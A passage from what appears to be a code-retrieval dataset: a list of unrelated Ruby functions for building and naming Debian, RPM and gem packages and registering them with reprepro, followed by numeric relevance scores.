"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)\n if pkginfo.kind_of?(String)\n raise ArgumentError, \"method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'\"\n end\n name = pkginfo.name\n\n debianize_name(name,\n build_type: pkginfo.build_type,\n with_rock_release_prefix: with_rock_release_prefix,\n release_name: release_name)\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def hadoop_package(name)\n return name unless hdp22?\n return name if node['platform_family'] == 'debian'\n fw = name.split('-').first\n pv = hdp_version.tr('.', '_').tr('-', '_')\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def fix_name(name)\n if name.start_with?(\"python\")\n # If the python package is called \"python-foo\" strip the \"python-\" part while\n # prepending the package name prefix.\n return [attributes[:python_package_name_prefix], name.gsub(/^python-/, \"\")].join(\"-\")\n else\n return [attributes[:python_package_name_prefix], name].join(\"-\")\n end\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def hadoop_package(name)\n return name unless hdp22? || iop?\n return name if node['platform_family'] == 'debian'\n fw =\n if name == 'spark-core'\n name\n else\n name.split('-').first\n end\n pv =\n if hdp22?\n hdp_version.tr('.', '_').tr('-', '_')\n else\n node['hadoop']['distribution_version'].tr('.', '_')\n end\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def package_name\n if supports_ports?\n if makefile_variable_value(\"PKGNAME\", port_path) =~ /^(.+)-[^-]+$/\n $1\n else\n raise Chef::Exceptions::Package, \"Unexpected form for PKGNAME variable in #{port_path}/Makefile\"\n end\n else\n new_resource.package_name\n end\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def safe_base_package_name\n if project.package_name =~ /\\A[a-z0-9\\.\\+\\-]+\\z/\n project.package_name.dup\n else\n converted = project.package_name.downcase.gsub(/[^a-z0-9\\.\\+\\-]+/, \"-\")\n\n log.warn(log_key) do\n \"The `name' component of IPS package names can only include \" \\\n \"lowercase alphabetical characters (a-z), numbers (0-9), dots (.), \" \\\n \"plus signs (+), and dashes (-). Converting `#{project.package_name}' to \" \\\n \"`#{converted}'.\"\n end\n converted\n end\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def built_rpm_names(build)\n build.\n # Just names from the rpms without nvr info\n brew_rpms.map(&:name_nonvr).\n # Remove any duplicates\n uniq.\n # Filter out any debuginfo names\n reject{ |name| name =~ /debuginfo/ }.\n # Remove prefixes if there are any for this product. (Mainly for SCL, see Bug 1003719)\n map { |name| BrewRpmNamePrefix.strip_using_list_of_prefixes(@errata.product.brew_rpm_name_prefixes, name) }\n end",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def package_name\n raise NotImplementedError\n end",
"def filtered_dependencies(pkginfo, with_rock_release_prefix = true)\n target_platform = @packager.target_platform\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, target_platform.architecture)\n\n deps_rock_pkginfos = pkginfo.dependencies[:rock_pkginfo].dup\n deps_osdeps_packages = pkginfo.dependencies[:osdeps].dup\n non_native_dependencies = pkginfo.dependencies[:nonnative].dup\n\n if target_platform.distribution_release_name\n # CASTXML vs. GCCXML in typelib\n if pkginfo.name =~ /typelib$/\n # add/remove the optional dependencies on the\n # rock-package depending on the target platform\n # there are typelib versions with and without the\n # optional depends. we know which platform requires\n # a particular dependency.\n deps_rock_pkginfos.delete_if do |pkginfo|\n pkginfo.name == \"castxml\" || pkginfo.name == \"gccxml\"\n end\n\n if target_platform.contains(\"castxml\")\n deps_osdeps_packages.push(\"castxml\")\n elsif target_platform.contains(\"gccxml\")\n #todo: these need to checked on the other platforms\n deps_osdeps_packages.push(\"gccxml\")\n else\n raise ArgumentError, \"TargetPlatform: #{target_platform} does neither support castxml nor gccml - cannot build typelib\"\n end\n end\n\n # Filter out optional packages, e.g. llvm and clang for all platforms where not explicitly available\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_optional.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n result = target_platform.contains(name)\n end\n end\n result\n end\n\n # Filter out excluded packages, e.g. libqwt5-qt4-dev\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_excluded.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n Packager.info \"#{pkginfo.name} excluding osdeps #{pkg_name} as dependency\"\n result = false\n end\n end\n result\n end\n\n # Filter ruby versions out -- we assume chroot has installed all\n # ruby versions\n #\n # This is a workaround, since the information about required packages\n # comes from the build server platform and might not correspond\n # with the target platform\n #\n # Right approach: bootstrap within chroot and generate source packages\n # in the chroot\n #deps_osdeps_packages = deps[:osdeps].select do |name|\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n name !~ /^ruby[0-9][0-9.]*/\n end\n\n # Prefer package of the OS for gems if they are available there\n #deps_nonnative_packages = deps[:nonnative].map do |name, version|\n non_native_dependencies = non_native_dependencies.map do |name, version|\n dep_name,is_osdep = native_dependency_name(name)\n # if with_rock_release_prefix is given all packages 'have to be'\n # os dependencies, otherwise it triggers further resolution of nonnative packages\n # which cannot exist (in resolve_all)\n if is_osdep || with_rock_release_prefix\n deps_osdeps_packages << dep_name\n nil\n else\n name\n end\n end.compact\n end\n\n deps_rock_packages = deps_rock_pkginfos.map do |pkginfo|\n debian_name = @packager.debian_name(pkginfo, with_rock_release_prefix)\n this_rock_release.packageReleaseName(debian_name)\n end.sort\n\n Packager.info \"'#{pkginfo.name}' with (available) rock package dependencies: '#{deps_rock_packages}'\"\n Packager.info \"'#{pkginfo.name}' with (available) osdeps dependencies: '#{deps_osdeps_packages}'\"\n\n # Return rock packages, osdeps and non native deps (here gems)\n {:rock => deps_rock_packages, :osdeps => deps_osdeps_packages, :nonnative => non_native_dependencies }\n end",
"def package_name\n raise Puppet::Error, 'luet requires packages have a category set' unless @resource[:category]\n\n \"#{@resource[:category]}/#{@resource[:name]}\"\n end",
"def full_name\n \"#{@package}.#{parameterized_name}\"\n end",
"def default_container_name\n full_release_name.gsub('_', '-')\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def StripReleaseNo(pkg_name)\n build_no_pos = Builtins.findlastof(pkg_name, \"-\") # find trailing build no.\n\n if build_no_pos != nil && Ops.greater_than(build_no_pos, 0)\n # cut off trailing build no.\n pkg_name = Builtins.substring(pkg_name, 0, build_no_pos)\n end\n\n pkg_name\n end",
"def reprepro_has_package?(debian_pkg_name, release_name, codename, arch)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n cmd = \"#{reprepro_bin} -A #{arch} -T deb -V -b #{reprepro_dir} list #{codename} #{debian_pkg_name}\"\n package_info = `#{cmd}`\n if !package_info.empty?\n Packager.info \"Reprepro: #{debian_pkg_name} available for #{codename} #{arch}\"\n return true\n else\n Packager.info \"Reprepro: #{debian_pkg_name} not available for #{codename} #{arch}\"\n return false\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def version_file_from( name )\n\t\treturn name.\n\t\t\tsplit( /-/ ).\n\t\t\treject {|word| PACKAGE_IGNORE_WORDS.include?(word) }.\n\t\t\tjoin( '/' )\n\tend",
"def pkg_binary; \"pacaur\" end",
"def key\n \"gem-package-#{name}\"\n end",
"def dcv_package\n \"nice-dcv-#{node['cluster']['dcv']['version']}-#{node['cluster']['base_os']}-#{dcv_url_arch}\"\nend",
"def package_name(val = NULL_ARG)\n @package_name = val unless val.equal?(NULL_ARG)\n @package_name.nil? ? @name : @package_name\n end",
"def package_from_name\n case name.downcase\n when 'splunk' then package :splunk\n when 'universal_forwarder' then package :universal_forwarder\n else raise 'Package must be specified (:splunk or :universal_forwarder)'\n end\n end",
"def package_name(val = NULL)\n if null?(val)\n @package_name || name\n else\n @package_name = val\n end\n end",
"def build_product(name, final_package_prefix=nil)\n dc_name = name.downcase # Ex: 'server', 'devkit', 'moxi'\n\n act_name = dc_name\n act_name = 'membase' if dc_name == 'server'\n\n package_prefix = get_package_prefix(dc_name)\n\n case os_short()\n when 'win'\n fix_ism(\"is_#{dc_name}/#{dc_name}.ism\")\n fix_script(\"is_#{dc_name}/Script Files/Setup.Rul\", dc_name)\n sh \"\\\"#{INSTALL_SHIELD}\\\" -p is_#{dc_name}/#{dc_name}.ism\"\n package_prefix = final_package_prefix if final_package_prefix\n FileUtils.cp(Dir.glob(\"./is_#{dc_name}/PROJECT*/**/setup.exe\")[0],\n \"./is_#{dc_name}/#{package_prefix}_setup.exe\")\n else\n # For other generic unix-y platforms, do a tar'ing.\n # Here, we depend on a previous build_product_mm() step to\n # have filled the out directory with the right files.\n out_dir = get_tmp(\"#{package_prefix}\", false)\n\n if latest_only()\n suffix = 'latest'\n else\n suffix = product_version()\n end\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n familiarize = \"./RedHat/familiarize_#{act_name}.sh RedHat\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(familiarize)\n elsif is_ubuntu?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n make_bin_dist = \"./Ubuntu/make_bin_dist_#{act_name}.sh Ubuntu\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(make_bin_dist)\n end\n end\n\n if os_short() == 'sunos'\n tar = \"gtar\"\n else\n tar = \"#{bin('tar')}\"\n end\n\n print \"File.dirname(out_dir): #{File.dirname(out_dir)}\\n\"\n\n package = \"#{package_prefix}_#{suffix}.tar.gz\"\n cmd = \"#{tar} --directory #{File.dirname(out_dir)}\" +\n \" -czf #{package}\" +\n \" #{File.basename(out_dir)}\"\n hard_sh(cmd)\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.rpm\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.rpm\"\n hard_sh(cmd)\n\n cmd = \"cp #{package_prefix}_#{suffix}.tar.gz\" +\n \" ~/rpmbuild/SOURCES/#{package_prefix}_#{PRODUCT_VERSION_PREFIX}.tar.gz\"\n hard_sh(cmd)\n cmd = \"rpmbuild -bb RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n cmd = \"rm RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n\n cmd = \"mv ~/rpmbuild/RPMS/*/#{package_prefix}-#{PRODUCT_VERSION_PREFIX}-1.*.rpm #{package}\"\n hard_sh(cmd)\n elsif is_ubuntu?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.deb\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.deb\"\n hard_sh(cmd)\n\n cmd = \"mv ./Ubuntu/deb-dev/#{package_prefix}_*.deb #{package}\"\n hard_sh(cmd)\n end\n end\n\n if package\n if final_package_prefix\n package_prev = package\n package = final_package_prefix + '_' + package.split('_')[1..-1].join('_')\n cmd = \"mv #{package_prev} #{package}\"\n hard_sh(cmd)\n end\n\n hard_sh(\"md5sum #{package} > #{package}.md5\")\n end\n end\nend",
"def default_dev_package\n # Check for an override.\n return dev_package_overrides[package_name] if dev_package_overrides.include?(package_name)\n suffix = node.value_for_platform_family(debian: '-dev', rhel: '-devel', fedora: '-devel')\n # Platforms like Arch and Gentoo don't need this anyway. I've got no\n # clue how Amazon Linux does this.\n if suffix\n package_name + suffix\n else\n nil\n end\n end",
"def debian_version\n super ||\n ( version_gte?( ubuntu_version, [18,4] ) && '10' ) ||\n ( version_gte?( ubuntu_version, [15,4] ) && '8' ) ||\n ( version_gte?( ubuntu_version, [14,4] ) && '7' ) ||\n ( version_gte?( ubuntu_version, [12,4] ) && '6' )\n end",
"def release_name\n return nil unless @data['name'] && @data['version']\n [ dashed_name, @data['version'] ].join('-')\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def is_deb?\n return !!@name.match(/^(debian|ubuntu|cumulus|huaweios)-.*$/)\n end",
"def rpm_no_arch\n @rpm_no_arch\n end",
"def release_manifest_name\n \"#{name}-release-manifest\"\n end",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def package_basename(extension='.gem')\n [ package_name, version ].join('-') + extension\n end",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def package_repository(package_name, desired_version, arch = nil)\n package(package_name, arch, true, false) do |pkg|\n return pkg.repoid if desired_version == pkg.version.to_s\n end\n\n nil\n end",
"def repository_name\n @repository_name ||= \"#{project_name}-boshrelease\"\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def get_linux_distro_version_codename\n version_codename_regex = /^VERSION_CODENAME=\\W*(\\w+)\\W*/\n File.open('/etc/os-release') do |release_file|\n release_file.each do |line|\n return line.match(version_codename_regex)[1].downcase if line =~ version_codename_regex\n end\n end\n ''\n end",
"def file_name\n \"#{full_name}.gem\"\n end",
"def default_platform_service_name(version: installed_postgresql_major_version, source: installed_postgresql_package_source)\n if platform_family?('rhel', 'fedora', 'amazon') && source.eql?(:repo)\n \"postgresql-#{version}\"\n else\n 'postgresql'\n end\n end",
"def deregister_debian_package(pkg_name_expression, release_name, codename, exactmatch = false)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n logfile = File.join(log_dir,\"deregistration-reprepro-#{release_name}-#{codename}.log\")\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n\n if exactmatch\n cmd << \"remove\" << codename << pkg_name_expression\n else\n cmd << \"removematched\" << codename << pkg_name_expression\n end\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n Packager.info \"Remove existing package matching '#{pkg_name_expression}': #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n Packager.info \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n else\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n cmd << \"deleteunreferenced\"\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def supported_pkgs\n {\"rpm\"=>1, \"deb\"=>1}\nend",
"def rings_project_name\n \"#{root_project_name}#{RINGS_PREFIX}\"\n end",
"def get_saltstack_package_full_name(package)\n # pillar = YAML.safe_load(File.read('test/salt/pillar/windows.sls'))\n url = 'https://raw.githubusercontent.com/saltstack/salt-winrepo-ng/master/'\n files = [package + '.sls', package + '/init.sls']\n # example: package = \"7zip\"=>{\"version\"=>\"18.06.00.0\", \"refresh_minion_env_path\"=>false}\n saltstack_package_full_name = files.find do |checkme|\n ps = \"$f = (((Get-ChildItem -Path $env:LOCALAPPDATA -Filter 'salt-winrepo-ng' -Recurse -Directory).Fullname[0]) + '\\\\#{checkme.sub('/', '\\\\')}'); if (Test-Path $f -PathType Leaf) {Get-Content -Path $f}\"\n begin\n file = (open(url + checkme) & :read)\n rescue\n begin\n file = (powershell(ps).stdout)\n rescue\n next\n end\n end\n unless file.nil? || file.empty?\n candidate = file.match(/full_name: '([\\S]+).*'/).captures[0]\n end\n break candidate unless candidate.nil?\n end\n Inspec::Log.debug('[get_saltstack_package_full_name] found candidate: ' + saltstack_package_full_name)\n saltstack_package_full_name\nend",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def reprepro_has_dsc?(debian_pkg_name, release_name, codename, reuseLock = false)\n @reprepro_lock.lock unless reuseLock\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n cmd = \"#{reprepro_bin} -T dsc -V -b #{reprepro_dir} list #{codename} #{debian_pkg_name}\"\n package_info = `#{cmd}`\n if !package_info.empty?\n Packager.info \"Reprepro: dsc file for #{debian_pkg_name} available for #{codename}\"\n return true\n else\n Packager.info \"Reprepro: dsc file for #{debian_pkg_name} not available for #{codename}\"\n return false\n end\n ensure\n @reprepro_lock.unlock unless reuseLock\n end\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def get_pkg_extn\n node.java.version == '6' ? 'bin' : node[:java]['package']['extn']\n end",
"def available_version(package_name, arch = nil)\n version(package_name, arch, true, false)\n end",
"def gem_name\n \"#{@account}-#{@name}\"\n end",
"def to_s\n \"#{@distro.capitalize} #{@product.gsub(/_/, ' ').capitalize} #{@version}\"\n end",
"def name(_prefix = false)\n 'Puppet Functions'\n end",
"def spec_name\n \"#{full_name}.gemspec\"\n end",
"def kernel_release\n uname('-r')\n end",
"def native_release_packages\n @attributes[:native_release_packages]\n end",
"def package_file\n File.join('/tmp/fpm-recipes/duo-openvpn/pkg',\n case node['platform_family']\n when 'debian'\n \"duo-openvpn_#{version}-#{revision}_amd64.deb\"\n when 'rhel'\n \"duo-openvpn-#{version}-#{revision}.x86_64.rpm\"\n end)\n end",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def generateBuildNamePrefix_Debug()\n prefix = generateBuildNamePrefix\n return prefix + \"-debug\"\nend",
"def type_and_version\n self.name.gsub(\"#{Licensed::Sources.name}::\", \"\")\n .gsub(/([A-Z\\d]+)([A-Z][a-z])/, \"\\\\1_\\\\2\".freeze)\n .gsub(/([a-z\\d])([A-Z])/, \"\\\\1_\\\\2\".freeze)\n .downcase\n .split(\"::\")\n end",
"def bot_short_name_without_version(pr)\n bot_short_name(pr).sub(/_v\\d*$/, '_v')\n end",
"def fully_qualified_name\n return \".#{self.package}\"\n end",
"def rpm_package_information\n super\n end",
"def get_java_ospkg_name (platform, version, type)\n pfx = \"#{platform.downcase == 'rhel' ? \"java-1.#{version}.0-\" :''}\"\n case platform.downcase\n when 'rhel'\n sfx = (type.downcase == 'jre' ? '' :'-devel')\n else\n sfx = \"-#{version}-\".concat(type.downcase == 'jre' ? 'jre' :'jdk')\n end\n \"#{pfx}openjdk#{sfx}\"\n end",
"def getNameForPrecompiled\n sanitizeForPath(\"#{@Name}_#{@Version}_\" +\n (@BranchEpoch ? \"sv_#{@BranchEpoch}_\" : '') +\n \"opts_#{optionsHash}\")\n end",
"def project_name\n DeliveryGolang::Helpers.project_name(node)\n end",
"def dmg_package_app\n case new_resource.source\n when :direct\n ::File.basename(package_metadata[:url], '.dmg')\n else\n ::File.basename(new_resource.source.to_s, '.dmg')\n end\n end",
"def package_set_name(path, branch='master')\n file = dir_git(path,branch,/source\\.yml/)\n raw = raw_file_from_git(path,file[0])\n yaml = YAML.load(raw)\n yaml[\"name\"]\n end",
"def gem_name\n @gem_name ||= \"sprout-#{clean_name}-library\"\n end",
"def full_name\n \"#{spec.name}-#{spec.version}\"\n end",
"def manifest_name(name, pack_type)\n name.chomp(\".#{pack_type}\")\n end",
"def version_tag_prefix\n if root_path == repo.root_path\n 'v'\n else\n (repo_rel_path / 'v').to_s\n end\n end"
] | [
"0.8155794",
"0.7976292",
"0.78808445",
"0.7630828",
"0.7524989",
"0.7514469",
"0.6860359",
"0.68594384",
"0.6740509",
"0.671844",
"0.66456854",
"0.65610325",
"0.648769",
"0.6372021",
"0.63600284",
"0.6351584",
"0.63399094",
"0.6310774",
"0.63089454",
"0.6305904",
"0.629034",
"0.6286621",
"0.62648803",
"0.625493",
"0.61973244",
"0.6154207",
"0.61303467",
"0.6125259",
"0.6101456",
"0.606495",
"0.60479015",
"0.5967625",
"0.5959168",
"0.5957608",
"0.59039295",
"0.5894223",
"0.58698374",
"0.5852533",
"0.5847504",
"0.58281296",
"0.5823175",
"0.576218",
"0.57613564",
"0.5752895",
"0.5731973",
"0.57240903",
"0.571939",
"0.57131785",
"0.5700508",
"0.5698889",
"0.56937575",
"0.5675853",
"0.5666499",
"0.563792",
"0.5633305",
"0.56244594",
"0.56016505",
"0.55945796",
"0.5581084",
"0.5580865",
"0.55751324",
"0.5570325",
"0.554582",
"0.55409545",
"0.55221504",
"0.5518844",
"0.55115247",
"0.5511518",
"0.54758066",
"0.5471588",
"0.54478467",
"0.54451185",
"0.5420234",
"0.54189444",
"0.5407809",
"0.54018605",
"0.5394238",
"0.5393318",
"0.5386297",
"0.5384664",
"0.5383102",
"0.53810513",
"0.5373678",
"0.5373678",
"0.5373678",
"0.5373678",
"0.5367096",
"0.5367081",
"0.536166",
"0.5347765",
"0.5346637",
"0.53407705",
"0.5327955",
"0.532221",
